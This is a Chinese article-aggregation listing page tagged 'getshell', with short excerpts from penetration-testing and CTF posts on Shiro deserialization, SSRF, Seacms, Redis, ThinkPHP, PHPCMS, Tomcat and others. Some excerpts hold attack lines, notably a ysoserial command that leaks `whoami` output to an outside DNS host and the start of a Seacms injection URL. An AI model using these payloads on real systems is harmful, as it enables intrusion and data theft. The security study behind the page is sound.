E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Getshell
记录一次shiro反序列化
getshell
一个站http://wxbase.xxxxx.com/error/unauth一个包,发现有shiro反序列化漏洞使用ysoserialURLDNS模块探测java-jarysoserial.jarURLDNS"http://`whoami`.xxxx.ceye.io">payload.datpython2shiro-encode.py#-*-coding:utf-8-*-fromCrypto.C
daxi0ng
·
2020-06-25 19:53
漏洞复现
实战
getshell
新姿势-SSRF漏洞利用与
getshell
实战
实战
getshell
新姿势-SSRF漏洞利用与
getshell
实战一、什么地方最容易出现SSRF二、SSRF漏洞危害三、SSRF神器Curl的使用四、最常用的跳转绕过五、Python+SSRF实现端口扫描
Peter_Lv1
·
2020-06-25 18:35
SSRF
Getshell
后渗透(一)
二.什么是后渗透我们了解到前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们知道我们都想将这些漏洞加以利用或组合来进行
getshell
的。
YYK[17|6]
·
2020-06-25 18:13
后渗透
Seacms前台
getshell
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统。0x01利用EXPhttp://xxxx.com/search.php?searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:l
路边摊主
·
2020-06-25 15:29
WEB安全漏洞学习
堆入门之常见漏洞利用
基地址的常见方式、UseAfterFree、fastbinattack、Unlink和OffByOne进行了梳理,包含必要的调试过程和图解~leak_libc的几种常见方式在堆题中几乎不会出现含有后门函数直接
getshell
合天智汇
·
2020-06-25 13:12
Spring Boot Actuator从未授权访问到
getshell
前言部门大佬在某src上挖到了这个漏洞,是一个比较老的洞了,我觉得有点意思,就动手在本地搭了个环境测试一下。Actuator是springboot提供的用来对应用系统进行自省和监控的功能模块,借助于Actuator开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在Actuator启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统
合天智汇
·
2020-06-25 13:41
UNCTF其余WP
1.Pwn1Babyrop简单的一道栈溢出题目先泄露libc然后使用gadget
getshell
Exp如下:#name:doudoudedi#coding:utf-8frompwnimport*fromLibcSearcherimport
doudoudedi
·
2020-06-25 12:57
题目
学习
oscp——HTB——Bastard
0x00前言难度入门1级0x01信息收集0x02Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接
getshell
使用脚本直接
getshell
0x03Webshell
Bubble_zhu
·
2020-06-25 12:19
oscp
2020攻防演练弹药库
2020攻防演练弹药库各位小伙伴们,安全界一年一度的激动人心的攻防演练盛况即将来临:)这里给大家准备些弹药,主要是近些年的可以进后台/
getshell
的漏洞,漏洞太多难免疏漏.基本都是常规操作加一点小技巧
xyongsec
·
2020-06-25 11:21
PHPcms9.6.0 最新版任意文件上传漏洞(直接
getshell
)
*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载对于PHPcms9.6.0最新版漏洞,具体利用步骤如下:首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问接着我们找到phpcms网站注册模块,随便填一下信息然后我们用burpsuite抓包然后发送到repeater我们在最下面
qq_27446553
·
2020-06-25 03:01
php-hack
利用Thinkphp 5缓存漏洞实现前台
Getshell
(漏洞详情见参考资料)本文将会详细讲解:1.如何判断缓存漏洞存在的可能性2.如何利用Thinkphp5的框架漏洞结合网站的一些配置实现前台
getshell
希望可以给予读者一些关
qq_27446553
·
2020-06-25 03:01
php-hack
Redis主从复制
getshell
技巧
Redis未授权漏洞常见的漏洞利用方式:Windows下,绝对路径写webshell、写入启动项。Linux下,绝对路径写webshell、公私钥认证获取root权限、利用contrab计划任务反弹shell。基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着更多的可能性,等待被探索。一、Red
Bypass--
·
2020-06-25 01:28
[pwn]bugku pwn2
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成
getshell
Gao's blog
·
2020-06-25 00:09
宝塔面板6.x版本前台存储XSS+后台CSRF组合拳
Getshell
宝塔面板6.x版本前台存储XSS+后台CSRF组合拳
Getshell
对于宝塔漏洞复现和练习0×00什么是宝塔面板宝塔面板是一款使用方便,功能强大且终身免费的服务器管理软件,支持Linux与Windows
卿's Blog
·
2020-06-25 00:37
Web渗透
Web-Security-Learning
带目录)01月29日更新:新收录文章mysqlSSRFToRCEinMySQLMSSQLMSSQL不使用xp_cmdshell执行命令并获取回显的两种方法postgresql渗透中利用postgresql
getshell
橙虚缘
·
2020-06-24 22:18
web安全
后台
getshell
常用技巧
1.利用文件上传漏洞,找文件上传处想办法上传php文件。一些网站在设置可以允许修改上传的文件类型则直接添加php有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况这种情况直接上传一个.hatccess文件覆盖这个,让其失效。或者上传不重命名的话上传../../shell.
黑面狐
·
2020-06-24 22:38
web安全
从无到有分析thinkphp6 session文件操作漏洞
该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以
getshell
。
Blus.King
·
2020-06-24 21:46
信息安全
raven靶机实战(linux-udf提权)-vuluhub系列(四)
这是vulnhub靶机系列文章的第四篇,本次的靶机感觉还是挺有趣的,学到的重要知识点为linux下-mysql的udf提权以及某cms的漏洞
getshell
,开始吧...靶机下载链接:https://download.vulnhub.com
PANDA墨森
·
2020-06-24 18:00
利用Thinkphp 5缓存漏洞实现前台
Getshell
(漏洞详情见参考资料)本文将会详细讲解:如何判断缓存漏洞存在的可能性如何利用Thinkphp5的框架漏洞结合网站的一些配置实现前台
getshell
希望可
云梦逸兮
·
2020-06-24 14:01
Thinkphp
5.0.x
Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马
木马中均包含以下代码:define(‘Viv,bebegim.’,‘Denzel-你的英雄’);经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的
getshell
啊哈条子
·
2020-06-24 11:14
修复weblogic的JAVA反序列化漏洞的多种方法--预防
GetShell
攻击
0x00前言目前oracle还没有在公开途径发布weblogic的JAVA反序列化漏洞的官方补丁,目前看到的修复方法无非两条:使用SerialKiller替换进行序列化操作的ObjectInputStream类;在不影响业务的情况下,临时删除掉项目里的“org/apache/commons/collections/functors/InvokerTransformer.class”文件。Objec
lishuai05251986
·
2020-06-24 06:24
java
[原创]K8Cscan插件之Weblogic CVE-2019-2725
GetShell
Exploit(内网渗透/支持批量/可跨网段)
10519321.htmlWeblogicScan插件K8CscanMoudleWeblogicScan&Exploit目前仅支持漏洞编号CNVD-C-2019-48814该版本为探测weblogic漏洞并自动
GetShell
k8gege
·
2020-06-24 00:17
工具
原创
weblogic
getshell
exploit
记bugku上做的两道pwn题
bugkupwn第二题:首先将文件拖进ida,发现一个重要函数
getshell
,发现flag也是在这里,也就是说这里的地址就是flag所在的地址。
inryyy
·
2020-06-23 18:15
phpmyadmin
getshell
本来搞了一个站,想记录一下,结果手抖刷新了一下写文章的界面,写了一大半的文章就没了…简单说一下,进入phpmyadmin后,
getshell
有两种办法。
hsj_csdn
·
2020-06-23 15:42
安全
Dedecms 5.7 SP2后台
getshell
###Dedecms5.7SP2后台
getshell
####前言最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台
getshell
的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手
灰色世界的阿信
·
2020-06-23 13:10
代码审计
Web安全
通达OA 2011-2013 通杀
GETSHELL
转载自T00ls此程序应用于非常多的政府机构,教育机构,以及各大一流公司(中国电信等)!请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等…本人发此贴纯属技术交流探讨,并无怂恿别人去尝试攻击的意思!若不接受以上条件的请自觉关闭,由此产生的后果与作者(本人)无关!EXP:第一步:1[GET]http://site/general/crm/studio/modules/EntityRel
god_7z1
·
2020-06-23 10:39
漏洞收集
通达oa
getshell
分析
在general/vmeet/下的privateUpload.php文件我们看看代码include_once("inc/conn.php");//包含conn.php该文件include_once("inc/utility_file.php");//包含utility_file.php这个文件ob_end_clean();//清除缓冲区$uploadFileName=$_FILES['Fileda
god_7z1
·
2020-06-23 10:39
漏洞收集
discuz x1.5 discuz 7.2 后台
getshell
0day通杀版出来
discuzx1.5discuz7.2后台
getshell
0day通杀版,不知海浪做好防御没有~~~附上从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。
god_7z1
·
2020-06-23 10:08
Hacking
ZZZPHP1.61 代码审计-从SQL注入到
Getshell
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅!注:文章还是原来的方式,先复现后分析,阅读用时约7分钟。SQL注入漏洞(获取管理员密
dfdhxb995397
·
2020-06-23 04:06
2015通达oa-从前台注入到后台
getshell
最近做众测的时候遇上的一个系统,2015版本的最新更新日期:2016-07-22注入分析\inc\common.inc.php$_v){$var[$_k]=securerequest($_v);}}else{if((0$_v){checkrequest($_k);checkrequest($val[$_k]);}}else{if((0$val){$val[$key]=removexss($val)
dengzhasong7076
·
2020-06-23 03:25
JBOSS漏洞精简利用
文章目录JBOSS漏洞精简利用简单介绍:反序列化:未授权+弱口令/
getshell
:简单介绍:JBoss是J2EE应用服务器,但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat
SoulCat.
·
2020-06-23 00:28
中间件
Python沙箱逃逸总结
python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至
getshell
。0x01__builtins__首先我们从python的内建函数__builtins__说起。
6um1n
·
2020-06-22 20:30
Python
THINKPHP5
getshell
复现环境以别人搭建好的5.1.29环境:https://github.com/vulnspy/thinkphp-5.1.29代码追踪index.phpContainer::get(‘app’)最终调用invokeReflectMethod(),指定对应类的对应方法,传入对应参数。关键parseModuleAndClass方法中,当$name以反斜线"\"开始时直接将其作为类名。利用命名空间的特点,
caiqiiqi
·
2020-06-22 19:35
Web
一次授权渗透实战
文章目录前言目标基本信息
Getshell
过程后缀名校验绕过内容校验绕过内容加密内容混淆总结前言很久没有整理实战文章了,恰好这周项目上有一个目标折腾了两天时间,记录分享下其中的心路历程(本次渗透过程均在目标授权下进行
bylfsj
·
2020-06-22 19:14
web大实战
CTF之萌新web学习(命令执行2)
命令执行2命令执行无回显情况可控字符串长度限制
getshell
15个字符7个字符4或5个字符无字母数字
getshell
异或运算取反自增进行实验测试命令执行无回显情况判断方法使用延时sleepHTTP请求
bmth666
·
2020-06-22 18:28
ctf
Buuctf pwn1 详细wp
目录程序基本信息程序溢出点确定返回地址编写exp脚本成功
getshell
程序基本信息我们可以看到这是一个64程序,没有保护开启。程序溢出点gets函数可以读取无限字符,存在栈溢出。
anxiong1803
·
2020-06-22 14:33
“百度杯”CTF比赛 九月场
Test:题目提示查资料打开地址,是一个海洋cms海洋cms有个前台
getshell
的漏洞在地址后加上/search.php?
andiao1218
·
2020-06-22 14:31
新的部署架构之下,如何拿shell?
常规的
getshell
手段,如SQL注入写入文件,任意文件上传,文件包含等似乎已不再好使。这种情况,如何突破系统的部署架构,来获
an0708
·
2020-06-22 14:06
phpcms9-6-0 一键
getshell
工具
介绍一键化python1.pyhttp://xxx.com,如果是批量直接运行py文件即可待办[]加入对有验证码phpcms网站的支持[]加入批量(已完成)说明依赖库的安装pipinstallrequests代码#-*-coding:utf-8-*-'''----------------------Author:AkkumanBlog:hacktech.cn--------------------
ai74583
·
2020-06-22 12:57
利用lfi和phpinfo页面
getshell
前言在p神的小密圈里看到对lfi的利用,并使用vulhub搭建的环境,觉得思路清奇(当然需要扎实的php功底和网络知识),记录下来复现过程。原理原理在https://github.com/vulhub/vulhub/tree/master/php/inclusion这里。大致原理如下我们如果向一个php的站post一个文件(包含文件区块),不论站点代码是否处理文件,都会在/tmp目录下生成一个临时
adminuil
·
2020-06-22 12:46
渗透测试
PHPYUN任意文件上传导致
GETSHELL
简要描述:简单到你难以想象,只要网站还可以注册就可以
GETSHELL
,无视GPC,无视WAF。
_404root
·
2020-06-22 11:45
2018SUCTF
Getshell
特殊字符shell
0x01源码if($contents=file_get_contents($_FILES["file"]["tmp_name"])){$data=substr($contents,5);foreach($black_charas$b){if(stripos($data,$b)!==false){die("illegalchar");}}}题目并没有告诉我们黑名单,所以我们必须自己试一下~~稍微fu
HyyMbb
·
2020-06-22 10:54
BUUCTF刷题记录
2020 易博霖 CTF web
RCE_NOPAR无字符
GETSHELL
就行payload:eval(hex2bin(session_id(session_start())))改PHPSSEION值为16进制就行SSRF把file后面的参数两层
HyyMbb
·
2020-06-22 10:54
ctf
如何快速收
getshell
转载:https://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247486770&idx=1&sn=7f819a7f31b4a660e11a95d519f92145&chksm=ec1f580ddb68d11b4c8e6286136c5afa879a23c6a6465f12918776cf3f23568924b1ce613bf3&scene=0
梦想成为安全大佬的男人
·
2020-06-22 07:19
Web安全
网站
getshell
方式总结
1、直接上传木马文件2、数据库备份
getshell
获得可写的绝对路径后,将一句话写到数据库文件中,将数据库备份到指定路径,便可菜刀直连3、修改网站上传类型配置拿webshell有的网站在文件或者图片上传处做了限制
Seizerz
·
2020-06-22 05:51
姿势汇总
XCTF攻防世界(2019Xman第一阶段练习赛) Pwn 4-ReeHY-main 两种解法
一、栈溢出
Getshell
分析审计IDA代码,发现在create中存在栈溢出、类型转换漏洞。
Kaller_
·
2020-06-21 23:00
CTF
CTF
Pwn
Apache Shiro反序列化漏洞初学就深入研究+实战
春日暖阳缓缓升起的时候,在日常流量分析中发现了一个异常流量,经过与度娘私磨半晌才弄明白原来这个包是属于ApacheShiro框架,但历尽千辛万苦,使用已知网络上所有现有的工具都能检测到某网站存在该漏洞,可就是利用漏洞
getshell
Jietewang
·
2020-06-21 23:00
漏洞学习
Tomcat8 + 弱口令 && 后台
getshell
漏洞复现
一:搭建环境1、利用vulhub搭建环境,进入相关漏洞目录下cd/vulhub/tomcat/tomcat82、一键安装环境docker-composeup-d二:漏洞利用1、打开http://your-ip:8080/manager/html,输入弱密码tomcat:tomcat。2、制作木马文件,首先准备一个ma.jsp木马,压缩成ma.zip,再修改后缀名为ma.war。ma.jsp一句话木
Jerry____
·
2020-06-21 22:07
漏洞复现
Tomcat8
+
弱口令
&&
后台getshell
漏洞复现
齐博1.0全版本后台
getshell
漏洞复现
思路整理并详细说明了一下01用户登陆判断的地方admin/global.php在用户不存在地方呢执行了一个eval():eval(base64_decode("Y$webdb[_Notice]"));该参数打印出来:copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");将一个
yukialiu
·
2020-06-21 21:47
php
PHPCMS v9.6.0后台
getshell
思路来自于http://www.cnbraid.com/2016/09/18/phpcms/这里自己复现了一下,自己写了一下因为是后台的,还得登陆两次。。所以不好用,主要是学习学习漏洞来自于ROOTDIR/phpsso_server/phpcms/modules/admin/system.phppublicfunctionuc(){if(isset($_POST['dosubmit'])){$da
BAM9090
·
2020-06-21 17:46
上一页
13
14
15
16
17
18
19
20
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他